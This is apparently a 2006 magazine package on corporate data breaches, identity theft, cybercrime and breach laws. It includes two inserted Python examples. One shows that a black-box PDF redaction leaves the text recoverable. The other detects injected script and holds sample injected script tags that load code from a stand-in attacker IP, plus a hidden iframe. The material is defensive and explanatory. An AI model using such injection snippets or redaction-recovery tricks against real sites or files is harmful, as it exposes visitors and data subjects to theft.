The Losers, by Paul McDougall
The Victims, by Elena Malykhina
The Goods, by Larry Greenemeier
The Crooks, by Aaron Ricadela
The Law, by Marianne Kolbasuk McGee
Timeline: Mistakes Galore
Interactive Presentation: Personal Data Sieves
In the past few weeks, some of the largest U.S. banks, including Bank of America, Washington Mutual, and Wells Fargo, have had to reissue debit cards, all because of data theft. The banks haven't come clean with all the details about what went wrong. In the case of Citibank, Gartner analyst Avivah Litan contends the gaffe was the result of data being stolen from a company that stores PINs.
Olatunji Oluwatosin was sentenced to 16 months as part of the ChoicePoint investigation. (Photo courtesy of AP)
The consequences of vulnerable data management practices are becoming clearer with every new instance of exposed Social Security numbers, purloined PINs, and hacked accounts. Last month, one IT worker at Providence Health System in Portland, Ore., was fired and three others quit following the theft of computer tapes that held sensitive patient information, including addresses, phone numbers, and Social Security numbers. Staffers at the health care concern routinely brought the tapes home to back up the data on systems there. Predictably, the tapes were stolen from a van parked outside one of their residences.
Providence's gaffe shows how the financial and legal aftereffects of a breach spread like a bad rash. A company official told the Portland Oregonian that he expects the case, not including litigation costs, to cost from $7 million to $9 million. That includes providing affected patients with access to credit monitoring and restoration services. There's also the prospect of civil lawsuits by state agencies or individuals whose data was stolen, potentially costing millions more. "I'm looking at this case, monitoring it," says Shannon Smith, senior counsel with the Washington state attorney general's office. Smith has an eye on Providence because the company has operations in Washington. Generally speaking, she says, "it's an unfair business practice for a company to fail to take reasonable measures to secure the personal information of customers or other consumers."
ChoicePoint CEO Derek Smith has had a long year of explaining after his company sold data to scammers. (Photo courtesy of AP)
People's Bank in Bridgeport, Conn., offers a harsh lesson for companies that know they have a security risk but haven't yet fixed it. The bank earlier this year was switching from shipping backup tapes by courier to a system that transmits data to credit bureaus electronically using an encrypted format to eliminate the risk of lost or stolen tapes. "When we heard about similar incidents in the industry last year, we identified this as an operational risk and took steps," CTO Srihari Makkala says.
Too late. In January, the bank disclosed that UPS had lost a tape containing data on 90,000 customers of its personal credit-line service. The tape held names, addresses, and Social Security and checking account numbers. The bank maintains the data can't be read without access to sophisticated mainframe hardware and software. That is a claim about the tape format, not about encryption: it only holds against a thief who can't buy or rent time on the right equipment.
Still, it's ugly PR and expensive. People's Bank is footing the bill for customers who need to sign up for credit monitoring and restoration services, and shelling out for a major consulting firm to perform an end-to-end review of its security procedures. The inspection will go beyond IT systems and include everything from premises security to the way employees handle documents, such as faxes, that bear customer data. Without providing specifics, Makkala says total costs could be substantial. "When something like this happens, we don't want to put a price on reputation, but it's significant," he says. "It's high risk and high cost."
It's unclear if the bank will try to recoup any costs from UPS, since the investigation is ongoing. A UPS spokesman calls the loss "an unfortunate occurrence" and says UPS uses special security measures for sensitive packages, but he declined to detail them or say whether they were used in this instance.
People's Bank has its encryption system running, but it still exchanges physical media with the Internal Revenue Service and others that aren't ready for encrypted files. "We're at the mercy of the institutions on the other end," Makkala says.
Beyond the immediate sting, data breaches can result in a loss of future business. "There's no telling what's gone in the opportunity column," says Frank Caserta, chief security officer at Acxiom, a data management provider that had files containing names and other information on millions of credit card holders stolen.
A spammer in Florida, Scott Levine, last month was sentenced to eight years in prison for his role in the theft, which occurred in 2003. Levine, 46, used his firm's limited authorized access into Acxiom's systems as a gateway into more closely guarded files. "Permissions were set incorrectly and that made the files visible," Caserta says. The judge presiding over Levine's trial determined the theft resulted in actual losses to Acxiom of about $850,000, but the damage goes beyond that. "The cost to your reputation is huge," says Caserta. "If you can't maintain trust in a business like ours, you're out of business."
After the theft became public, prospective customers took more time than usual in deciding whether to do business with Acxiom. "We suffered some delays," Caserta admits. No Acxiom employees lost their jobs because of the incident, which Caserta says was the result of a relatively minor technical glitch. "You can't just go on a witch hunt because you need a body to hold up," he says. However, some people have since been let go in unrelated incidents for violating security policies, either knowingly or through carelessness. "There have been other areas where someone breaks a rule, and by God, the discipline for that is swift and understood," Caserta says.
Acxiom also has paid a price in terms of the increased staff and management hours devoted to quelling customers' concerns about its security. The number of clients asking to audit Acxiom's security systems has increased dramatically. "They do a deep dive on security at every level," Caserta says. The company hired consultants to perform SAS 70 and other audits of its security and related IT processes.
New York Sen. Schumer frets about personal data in public records. (Photo courtesy of UPI)
The costs are starting to mount. According to its most recent quarterly report, B.J.'s took $10 million in charges to cover expected claims by banks that issued the cards whose data was stolen. The banks were forced to reimburse card holders for the purchases made in their names. As of October, banks were seeking $13 million in compensation, a number that could increase as more scam purchases are linked back to the original data theft. B.J.'s is looking to recover some of its losses from IBM, claiming that when it upgraded card-processing software, it told IBM to deactivate a feature that retains magnetic-stripe data so that a transaction can be processed offline. It's that retained stripe data that was stolen. Keeping full stripe data after a transaction has been authorized is exactly what the card brands' security rules forbid, precisely so that there is nothing of the kind on a retailer's systems to steal. IBM declined to comment.
B.J.'s settlement with the FTC requires it to hire an external auditor to scrutinize its security systems every two years for the next two decades. That's similar to the penalty levied against CardSystems Solutions, which processes credit card transactions, when thieves broke into its systems and stole data resulting in millions of dollars in fraudulent purchases. The FTC has mandated that CardSystems, which was acquired by Pay By Touch in December, implement an IT security program and submit to an external security audit every other year for the next 20 years.
Top 10 Customer Data-Loss Incidents

| Company/Organization | No. of affected customers | Date of initial disclosure |
|---|---|---|
| CardSystems | 40 million | June 17, 2005 |
| Citigroup | 3.9 million | June 6, 2005 |
| DSW Shoe Warehouse | 1.4 million | March 8, 2005 |
| Bank of America | 1.2 million | Feb. 25, 2005 |
| Wachovia, Bank of America, PNC Financial Services Group, Commerce Bancorp | 676,000 | April 28, 2005 |
| Time Warner | 600,000 | May 2, 2005 |
| Georgia Department of Motor Vehicles | 465,000 | April 2005 |
| LexisNexis | 310,000 | March 9, 2005 |
| University of Southern California | 270,000 | July 19, 2005 |
| Marriott International | 206,000 | Dec. 28, 2005 |

Note: As of March 2006. Data: Privacy Rights Clearinghouse, InformationWeek
ChoicePoint paid dearly earlier this year when it agreed to pay $15 million in fines after unwittingly selling more than 100,000 consumer credit reports to thieves posing as legit customers. The FTC said the company didn't have "reasonable procedures" for screening customers.
Government data breaches can be costly, too. The state of Rhode Island was forced to take down its online vehicle registration system in January after hackers stole user information, including credit card numbers. The state is looking to hire a chief security officer to prevent a repeat, but it could be a long search. "It's tough finding someone. The private sector can afford to pay more than we can," says Beverly Najarian, director of the state's department of administration.
Businesses, schools, and government agencies need to get the problem under control. Paranoia over unintended data disclosures is apparent and appropriate; what's needed now is greater urgency in putting a stop to them.
It was an inside job. A lab technician who had tested Drew's blood at the Seattle Cancer Care Alliance gained unauthorized access to the hospital's computer records and used Drew's personal information to open credit card accounts. The technician, Richard Gibson, later turned himself in to the police and pleaded guilty to violating the Health Insurance Portability and Accountability Act. Gibson became the first person charged under HIPAA with misusing a patient's medical information for financial gain.
"It's disturbing that financial institutions issued credit cards without any [due] diligence that the real Eric Drew was in a hospital," Drew says.
Unfortunately, Drew's situation is all too familiar. There have been 8.9 million adult victims of identity fraud in the United States over the past 12 months, according to a report issued earlier this year by Javelin Strategy and Research and the Better Business Bureau. That's down slightly from the 9.3 million victims a year earlier, but not a sign of great progress. The problem "is not lessening significantly," says Beth Givens, director of the Privacy Rights Clearinghouse, a watchdog group that tracks data breaches that could lead to ID theft.
Givens partly blames creditors that are too willing to extend credit to people they don't know well enough and who are sometimes impostors working with false identities. "The credit evaluation process is automated," she says. "They're not looking for obvious red flags."
J. Alex Halderman, a doctoral candidate in computer science at Princeton University, about a year ago received a letter from the University of California, Berkeley, where he had been accepted as a graduate student in 2003, advising him that his personal data had been compromised. A university computer had been stolen that contained files with names and Social Security numbers of applicants and others at the university.
Berkeley warned people affected by the breach to be on the lookout for scam artists who might try to contact them under the pretense of being affiliated with the school. Halderman was shocked that two years after he applied to UC Berkeley, the application remained susceptible to a data breach. "It's amazing that data can be on file for years, even when you think you're finished with it," he says. "There's no way to take it back."
Although there was no evidence that Halderman's personal data was misused, he had a fraud alert placed on his credit file. That service lasted only 90 days, however, and he still worries that his information may fall into the wrong hands.
Warren Lambert gets word that his personal information may have been stolen from ChoicePoint.
Keith Ernst of Durham, N.C., had his debit card number posted to an Arabic-language bulletin board on the Web in 2004, making it easy to find through simple search engine queries. Several charges were rung up on his card, including a laptop purchase and an attempted tuition payment. "I got a phone call out of the blue saying that someone is using my debit card," Ernst says.
Ernst doesn't know how his debit card number got on the Web; he suspects it had something to do with a purchase he made on the Internet. He canceled the card and the bank restored the money that came out of his checking account, but Ernst learned a lesson. "I now use credit cards instead of debit cards when I shop online. I also pay a lot more attention to the vendors that I'm buying from," he says. "I would never buy from an unknown vendor."
Consumer confidence suffers at the hands of hackers and ID thieves and lax data protection measures. That means businesses ultimately feel the pain of their own negligence.
No one seems to know how often Social Security numbers and other personal information are carelessly posted on the Web, but government agencies from the Department of Justice to village clerks have slipped up. In December, InformationWeek reported that certain pages on the Justice Department's Web site included the names and Social Security numbers of people involved in department-related legal actions.
Justice acknowledged the personal information shouldn't have been publicly available, and the documents are now blocked from view. The Social Security numbers, however, still can be reached through general-purpose search engines. Taking a page down does not take it out of the engines' cached copies or their "view as HTML" versions, and a black box drawn over text in an Adobe PDF file can be bypassed by copying the text into Microsoft Word.
Levine turned limited access to Acxiom systems into major theft.
"Having someone's Social Security number is having the key to that person's identity," says Dana Lesemann, VP and deputy general counsel at Stroz Friedberg, a consulting firm specializing in computer forensics. Thieves use a name and Social Security number to get other information and then order credit cards, take out mortgages, and apply for other services using the victim's identity.
There aren't any laws prohibiting the collection and use of Social Security numbers, though people who use them for identity theft can be prosecuted for fraud. Bills were introduced in Congress last year to establish criminal penalties for buying and selling Social Security numbers and are now in committee (see story, "The Law").
When sensitive information is freely available to the public on the Web, it's often the result of carelessness and rarely a technology problem. As with most aspects of security, training in the proper use of technology and data-handling policies is essential, says Lesemann, who has studied the ways PDF files in particular can be exploited to gain access to sensitive information. "Everyone uses PDF files, but no one understands the pitfalls."
Businesses create PDF files from scanned images, digital photos, and text documents. It's possible to restrict the way PDFs are viewed, printed, and edited, and a common way to block PDF content from view is to draw a black box over a portion of the page. However, the black box is just another drawing object layered on top of the text: the text itself stays in the file, so anyone who selects and copies the page, runs a text extractor over it, or deletes the box in an editor gets the "redacted" information back. A U.S. military report issued last year on the investigation into the fatal shooting of an Italian agent escorting a freed hostage through a checkpoint in Iraq included several black boxes blocking sensitive information. A PDF of the document was posted on the Web but was pulled when the military realized visitors could recover the hidden text by copying it into a Word document, Lesemann says. Proper redaction removes the underlying text, and any scanned-image layer behind it, before the box is drawn, and the scrubbed file should be checked by extracting its text rather than by looking at it.
A better understanding among business and government employees of how to properly scrub documents would go a long way toward resolving the problem.
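To make the black-box failure described above (and the copy-into-Word trick mentioned in the Justice Department passage) concrete, here is an added Python example; it is not from the original article, from Stroz Friedberg, or from any vendor named here. It builds a tiny uncompressed single-page PDF by hand, "redacts" a constructed sample SSN first by painting a black rectangle over it and then by deleting the text operator before painting the same rectangle, and runs one crude text extraction over both files. The page layout, the box coordinates, the sample patient line and the SSN value are all assumptions.

```python
import re

# Constructed sample page; the SSN is the standard example value, not a real one.
PAGE_LINES = [
    ("Patient: Jane Example", 72, 720),
    ("SSN: 123-45-6789", 72, 700),
]
SSN_PATTERN = re.compile(r"\d{3}-\d{2}-\d{4}")
# Black rectangle covering the SSN line: x, y, width, height in points (assumed layout).
SSN_BOX = (70, 696, 110, 16)
# A literal string operand followed by the Tj (show text) operator.
TJ_STRING = rb"\(((?:\\.|[^\\)])*)\)\s*Tj"


def pdf_escape(text):
    """Escape the three characters that are special inside a PDF literal string."""
    return text.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)").encode("latin-1")


def render_text(lines):
    """Content stream that draws each (text, x, y) line in 12pt /F1."""
    ops = [b"BT /F1 12 Tf"]
    for text, x, y in lines:
        ops.append(b"1 0 0 1 %d %d Tm (%s) Tj" % (x, y, pdf_escape(text)))
    ops.append(b"ET")
    return b"\n".join(ops)


def draw_black_box(box):
    x, y, w, h = box
    return b"0 g %d %d %d %d re f" % (x, y, w, h)


def redact_by_drawing_box(content, box):
    """The mistake: paint over the text. Every Tj operator stays in the stream."""
    return content + b"\n" + draw_black_box(box)


def redact_by_removing_text(content, pattern, box):
    """The fix: delete every string operand that matches, then paint the box so the
    page looks the same. A real redaction tool also strips images and metadata."""
    def drop_if_sensitive(m):
        return b"" if pattern.search(m.group(1).decode("latin-1")) else m.group(0)
    return re.sub(TJ_STRING, drop_if_sensitive, content) + b"\n" + draw_black_box(box)


def build_pdf(content):
    """Wrap a content stream in a minimal, uncompressed, single-page PDF 1.4 file."""
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] "
        b"/Resources << /Font << /F1 5 0 R >> >> /Contents 4 0 R >>",
        b"<< /Length %d >>\nstream\n%s\nendstream" % (len(content), content),
        b"<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>",
    ]
    out = bytearray(b"%PDF-1.4\n")
    offsets = []
    for num, body in enumerate(objs, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n%s\nendobj\n" % (num, body)
    xref_at = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (len(objs) + 1, xref_at)
    return bytes(out)


def extract_text(pdf):
    """Recover the string operands of every content stream, which is all that
    select-all-and-paste or a text extractor does. Real files usually compress the
    stream with FlateDecode; pdftotext or a PDF library inflates it and continues."""
    found = []
    for stream in re.findall(rb"(?<!end)stream\n(.*?)\nendstream", pdf, re.S):
        for m in re.finditer(TJ_STRING, stream):
            found.append(re.sub(rb"\\([()\\])", rb"\1", m.group(1)).decode("latin-1"))
    return found


def leaks_ssn(pdf):
    """The check a publisher should run before posting: any SSN-shaped text at all?"""
    return any(SSN_PATTERN.search(s) for s in extract_text(pdf))


def make_badly_redacted_pdf():
    return build_pdf(redact_by_drawing_box(render_text(PAGE_LINES), SSN_BOX))


def make_properly_redacted_pdf():
    return build_pdf(redact_by_removing_text(render_text(PAGE_LINES), SSN_PATTERN, SSN_BOX))


if __name__ == "__main__":
    for label, pdf in (("box only", make_badly_redacted_pdf()),
                       ("text removed", make_properly_redacted_pdf())):
        print(label, "->", extract_text(pdf), "| leaks SSN:", leaks_ssn(pdf))
```

Both files render identically in a viewer, which is the whole problem: only the extraction step tells them apart. The same principle applies to scanned documents, where the "text" lives in an image or an OCR layer and must be cut out of those before the box is drawn.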
An industry has formed around the search for sensitive information. Sites including Identity Crawler, People-Search, Records Registry, and ZabaSearch.com aggregate and resell public data that was exposed through errors, lapses in privacy and security policy, and carelessness. These sites, which are used by private investigators and others, collect Social Security numbers and other personally identifiable information in any number of ways, including trolling the Web for unsecured documents.
But the bad guys don't always get away. In January, Bulgarian police arrested eight people in connection with an international phishing operation. Microsoft, which assisted in the investigation, said the group is part of a criminal network that steals personal information and commits fraud online. The group had sent E-mail forged to look as if it came from MSN customer service reps, then used purloined credit card information to buy goods and receive money transfers worth more than $50,000.
Last August, the FBI, along with Turkish and Moroccan police, arrested the authors of the Zotob and Mytob worms, which left infected PCs open to becoming part of zombie networks that could send spam, launch denial-of-service attacks, or swipe personal information. The FBI says the worm authors pilfered credit card numbers used to buy merchandise.
Yet many online data theft cases remain unsolved. In June 2004, organized criminals in Russia exploited a vulnerability in Microsoft's Web server software to append a small amount of JavaScript to pages served by several hundred E-commerce companies' servers running Microsoft's Internet Information Services (IIS). That script installed keystroke-logging software on visitors' PCs through their copies of Microsoft's Internet Explorer browser, in a way that went undetected by antivirus packages. When those users later visited the Web sites of banks such as Citibank and Wachovia, the keystroke logger captured their user names and passwords.
Researchers traced the scam to a group called the "hang-up team," but U.S. and Russian law enforcement have yet to make an arrest. "It was a clear turning point" from nuisance attacks to under-the-radar crimes for the sole purpose of capturing personal financial data, says Marcus Sachs, a deputy director in the computer science lab at SRI International and a cybersecurity consultant to the Department of Homeland Security.
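As an added example (mine, not from the article, SRI, or Microsoft), here is Python detection logic in the spirit of the incident above: given the HTML body a server actually sends, it flags script appended after the document ends, script loaded from hosts outside an allowlist, and zero-size iframes, over constructed sample pages. The site names, the allowlist, and the injected snippets are assumptions, and the checks are heuristics for this class of in-path page tampering, not a signature for the 2004 attack.

```python
import re
from urllib.parse import urlparse

# Assumed allowlist of hosts the site legitimately loads script from.
ALLOWED_SCRIPT_HOSTS = {"www.example-shop.test", "cdn.example-shop.test"}

# Constructed sample pages. CLEAN_PAGE is what sits on disk; the other two are what a
# compromised server might send for the same URL.
CLEAN_PAGE = (
    "<html><head><title>Checkout</title>\n"
    '<script src="https://cdn.example-shop.test/cart.js"></script></head>\n'
    "<body><h1>Checkout</h1></body></html>\n"
)
# Script appended after the document ends, the shape of a server-side footer injection.
APPENDED_PAGE = CLEAN_PAGE + '<script src="http://203.0.113.7/x.js"></script>\n'
# Inline script that writes an invisible frame pointing at an attacker-controlled host.
INLINE_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script>document.write("<iframe src=http://203.0.113.7/ width=0 height=0></iframe>")'
    "</script></body>",
)


def trailing_content(html):
    """Anything after the closing </html> tag; a well-formed page has only whitespace there."""
    end = html.lower().rfind("</html>")
    return "" if end < 0 else html[end + len("</html>"):].strip()


def external_script_hosts(html, allowed):
    """Hosts of <script src=...> tags that are not on the allowlist."""
    hosts = []
    for src in re.findall(r"<script[^>]+src=[\"']([^\"']+)", html, re.I):
        host = urlparse(src).hostname
        if host and host not in allowed:
            hosts.append(host)
    return hosts


def hidden_iframes(html):
    """Iframe tags declared with zero width or height, including ones inside script text."""
    return re.findall(r"<iframe[^>]*(?:width|height)=[\"']?0\b[^>]*>", html, re.I)


def audit_response(html, allowed=ALLOWED_SCRIPT_HOSTS):
    """Run all three checks on one response body and return human-readable findings."""
    findings = []
    tail = trailing_content(html)
    if tail:
        findings.append("content after </html>: " + tail[:60])
    for host in external_script_hosts(html, allowed):
        findings.append("script loaded from unlisted host: " + host)
    for tag in hidden_iframes(html):
        findings.append("zero-size iframe: " + tag[:60])
    return findings


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("appended", APPENDED_PAGE), ("inline", INLINE_PAGE)):
        print(name, "->", audit_response(page) or "no findings")
```

The most direct check of all needs no heuristics: fetch each static page through the production server from outside and compare the bytes to the file on disk, since an injecting filter changes the former and not the latter. The heuristics above are for the pages that are generated dynamically, where no byte-for-byte reference exists.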
Launching investigations quickly by combining consumer complaints with data from the FBI and technology companies is key to making arrests, says Dan Larkin, unit chief of the FBI's cyber division. With cybercrime, "the trail is pretty fast and fleeting, and the rules of evidence don't really apply on the international scale," Larkin says. The FBI has arrested more than 20 online data thieves since January, he says.
What's taken the place of publicity-seeking malware attacks is software written and distributed by professional criminals, and the resulting damage threatens to disrupt consumer confidence in online commerce.
But not all cyberthieves are pros. Jayson Harris, a 23-year-old Iowa resident, pleaded guilty in January to wire fraud and other charges for collecting data from Internet users by setting up sites that mimicked Microsoft's MSN billing Web site. And earlier this month, James Green, a former security guard on hire to General Motors, was arraigned on eight counts of obtaining, possessing, or transferring personal identity information, according to The Associated Press. He's accused of using his position with a private security firm to steal Social Security numbers of about 100 GM employees and sending them E-mails posing as a representative of GM's program for evaluating company vehicles.
Many phishing scams, in which thieves lure Web surfers to bogus sites where they're tricked into revealing personal financial information, originate in some of the former Soviet republics. Experts believe cases in which credit card numbers have been stolen from companies' servers have their roots there as well. Tim Cranton, a senior attorney and director of Internet safety enforcement programs at Microsoft, says the cybergangs operate like organized criminal networks in which members have different jobs (one may harvest E-mail addresses, while another installs code onto targeted PCs) and they communicate across national borders.
Tech vendors keep fighting back. Microsoft is expected this week to disclose 10 lawsuits against alleged phishers and plans for about 100 actions in the next month, part of a new global phishing enforcement initiative.
More than 20 states have data-protection laws, many of them modeled on the one in California. It's thanks to these state laws that we have our current understanding of how often companies lose data; before them, companies kept most of these mishaps out of public view. California law, for example, requires organizations to notify consumers if a breach or mishap puts data at risk.
Congress hasn't done much, despite speeches by the likes of Sens. Specter and Leahy. (Photo courtesy of Getty Images)
Since California passed its law in 2003, 12 more states have passed statutes allowing consumers to restrict access to their credit reports. Some states, including Texas and Vermont, only let people who already have been identity theft victims freeze their credit reports. Twenty-seven states have new security-freeze laws or modifications to strengthen existing laws pending, including Texas.
New Jersey, whose security-freeze laws went into effect in January, probably has the strongest safeguards. It requires credit bureaus to allow quick placement and lifting of freezes at minimal cost for consumers, so they can allow legitimate parties a kind of open-and-shut access to their records. New Jersey also prohibits any private or public entity from publicly posting or displaying a Social Security number or any four consecutive digits of a Social Security number. The law also prohibits Social Security numbers on mailings, and on Web sites, unless another authentication device or number is required to access the site.
In the past two years, more than a dozen bills have been introduced in the U.S. House and Senate that, if passed, would supersede existing state laws. Some of the federal proposals are stripped-down versions of state laws that would mean fewer breaches qualify for disclosure; under some, a data breach would have to be deemed a serious threat to consumers before the offending company would have to go public with information about the incident. Other proposals exempt certain kinds of companies.
Among the tougher bills is one introduced last summer by Sens. Patrick Leahy, D-Vt., and Arlen Specter, R-Pa., which would require companies to establish policies to protect customer data and rigorously vet third parties that process their data. Rep. Barney Frank, D-Mass., has proposed legislation requiring parties such as retailers to notify consumers of data breaches that involve credit cards. Today, they can tell the credit card companies, which can inform consumers and leave the retailers out of it. Frank wants to let consumers punch back: "Consumers should know where a break occurs and be able to take their business elsewhere, knowing that," a spokesman for Frank says.
With more courts, state agencies, and even town governments moving to the Web, they're exposing Social Security numbers, home addresses, and other identifiable personal information. Sen. Charles Schumer, D-N.Y., proposes legislation that would let some government entities, such as county clerks, omit certain personal information from public records.
Despite all this activity, Congress isn't likely to pass any sweeping laws. Several House and Senate committees, including banking, commerce, and judiciary, are considering various bills, but getting their members to compromise, especially across party lines, will be difficult in the short term. Says one source involved with identity theft issues, "There isn't a lot of agreement."